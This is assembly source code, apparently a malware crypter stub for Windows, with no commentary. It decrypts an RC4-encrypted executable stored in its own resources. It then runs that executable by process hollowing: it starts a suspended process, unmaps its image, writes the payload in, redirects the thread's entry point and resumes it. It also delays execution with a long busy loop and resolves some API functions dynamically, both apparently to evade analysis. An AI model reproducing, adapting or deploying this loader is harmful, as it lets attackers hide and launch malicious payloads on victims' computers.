;Compiled with MASM
.386
.model flat, stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\shell32.inc
include \masm32\include\ntdll.inc
include 123.inc
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\shell32.lib
includelib \masm32\lib\ntdll.lib
.code
Rc4_setkey proc Pass:DWORD, LenPass:DWORD
pushad
mov eax, 0FFFEFDFCh
mov ecx, 256/4
Init_rc4keytable:
mov dword ptr [rc4keytable+4*ecx-4], eax
sub eax, 04040404h
dec ecx
jnz Init_rc4keytable

xor eax, eax
mov edi, Pass

Key_return:
xor ebx, ebx
mov esi ,LenPass
jmp New_key

Key_loop:
inc bl
dec esi
jz Key_return

New_key:
mov dl, byte ptr [rc4keytable+ecx]
add al, byte ptr [edi+ebx]
add al, dl
mov dh, byte ptr [rc4keytable+eax]
mov byte ptr [rc4keytable+ecx], dh
mov byte ptr [rc4keytable+eax], dl
inc cl
jnz Key_loop

popad
ret
Rc4_setkey endp

Rc4_crypt proc iData:DWORD, LenData:DWORD
pushad
mov edi, LenData
mov esi, iData
test edi, edi
jz Rc4_enc_exit

xor eax, eax
xor edx, edx
xor ecx, ecx
        xor ebx, ebx

Rc4_enc_loop:
inc bl
mov dl, byte ptr [rc4keytable+ebx]
add al, dl
mov cl, byte ptr [rc4keytable+eax]
mov byte ptr [rc4keytable+ebx], cl
mov byte ptr [rc4keytable+eax], dl
add cl, dl
mov cl, byte ptr [rc4keytable+ecx]
xor byte ptr [esi], cl
inc esi
dec edi
jnz Rc4_enc_loop

xor eax, eax
mov edi, offset rc4keytable
mov ecx, 256/4
cld
rep stosd

Rc4_enc_exit:
popad
ret
Rc4_crypt endp

getadress proc module:DWORD,funcion:DWORD
	LOCAL fh:HMODULE	
	push module
	call LoadLibrary
	mov fh,eax
	push funcion
	push fh
	call GetProcAddress
	mov ebx,eax
	;invoke FreeLibrary,fh
	ret
	getadress endp
ExtractFile proc
local hResource:dword
LOCAL sinfo: STARTUPINFO
LOCAL pinfo: PROCESS_INFORMATION
LOCAL base: dword
LOCAL sec: ptr IMAGE_SECTION_HEADER
LOCAL cnt: CONTEXT



push 256
push offset mPath
push 0
call GetModuleFileName

push 0
call GetModuleHandle


mov hInstance, eax

invoke getadress,addr find1,addr find2

mov temp,ebx
push RT_RCDATA
push 1212
push hInstance
call temp

.if eax == 0
  	invoke ExitProcess,0
  .else
mov hResource, eax

;invoke SizeofResource, hInstance, hResource

push hResource
push hInstance
call SizeofResource
   .if eax != 0
   
    
    mov hResourceSize, eax
    
    
    
    ;invoke LoadResource, hInstance, hResource
    
    push hResource
    push hInstance
    call LoadResource
    
   ; invoke getadress,find1,find8
    ;mov temp,ebx
    ;push hResource
    ;push hInstance
    ;call temp
    
    
    
    .if eax != 0
      invoke LockResource, eax
		mov ResInf , eax
		invoke lstrlen,addr password
		invoke Rc4_setkey,addr password,eax
		invoke Rc4_crypt,ResInf,hResourceSize
		invoke RtlZeroMemory, addr sinfo, sizeof STARTUPINFO
		
		
		;invoke CreateProcess, offset mPath, 0, 0, 0, 0, CREATE_SUSPENDED, 0, 0, addr sinfo, addr pinfo	
		
		invoke getadress,find1,find4
		mov temp,eax
		lea edx,pinfo
		push edx
		lea edx,sinfo
		push edx 
		push 0
		push 0
		push CREATE_SUSPENDED
		push 0
		push 0
		push 0
		push 0
	    push offset mPath
        call CreateProcess
		
		
		invoke RtlZeroMemory, addr cnt, sizeof CONTEXT
		mov cnt.ContextFlags, CONTEXT_INTEGER
	
	    invoke GetThreadContext, pinfo.hThread, addr cnt
		
		
	;	invoke GetModuleHandle, 0
		push 0
		call GetModuleHandle
		
	
				
		
	;	invoke ZwUnmapViewOfSection, pinfo.hProcess, eax
		
		push eax
		push pinfo.hProcess
		call ZwUnmapViewOfSection
		
		
		mov edi, ResInf 
		add edi, IMAGE_DOS_HEADER.e_lfanew[edi]
		assume edi:  ptr IMAGE_NT_HEADERS
		
		invoke VirtualAllocEx, pinfo.hProcess, [edi].OptionalHeader.ImageBase, [edi].OptionalHeader.SizeOfImage, MEM_COMMIT + MEM_RESERVE, PAGE_EXECUTE_READWRITE
		
		mov base, eax
		;invoke WriteProcessMemory, pinfo.hProcess, base, ResInf , [edi].OptionalHeader.SizeOfHeaders, 0
		
		invoke getadress,addr find1,addr find3
		mov temp,eax
		push 0
		push [edi].OptionalHeader.SizeOfHeaders
		push ResInf
		push base
		push pinfo.hProcess
		call temp
		
				lea eax, [edi].OptionalHeader
		mov sec, eax
		movzx eax, [edi].FileHeader.SizeOfOptionalHeader
		add sec, eax
		xor eax, eax
		xor esi, esi
		xor ecx, ecx
		.while ( si < [edi].FileHeader.NumberOfSections )
			imul eax, esi, sizeof IMAGE_SECTION_HEADER
	        add eax, sec
			mov ebx, base
			add ebx, IMAGE_SECTION_HEADER.VirtualAddress[eax]
			mov edx, ResInf 
			add edx, IMAGE_SECTION_HEADER.PointerToRawData[eax]
			
								
			invoke WriteProcessMemory, pinfo.hProcess, ebx, edx, IMAGE_SECTION_HEADER.SizeOfRawData[eax],0 
		
		inc esi
		.endw
		mov eax, base
		add eax, [edi].OptionalHeader.AddressOfEntryPoint
		mov cnt.regEax, eax
		invoke SetThreadContext, pinfo.hThread, addr cnt
		invoke ResumeThread, pinfo.hThread
		ret
    .endif
  .endif
.endif  
ExtractFile endp
_entrypoint:
mov loop_stopper,500000000
loop_start:
mov eax,0
push eax
pop eax
cmp loop_stopper, 0 
dec loop_stopper
jg loop_start
invoke ExtractFile
invoke ExitProcess, 0
end _entrypoint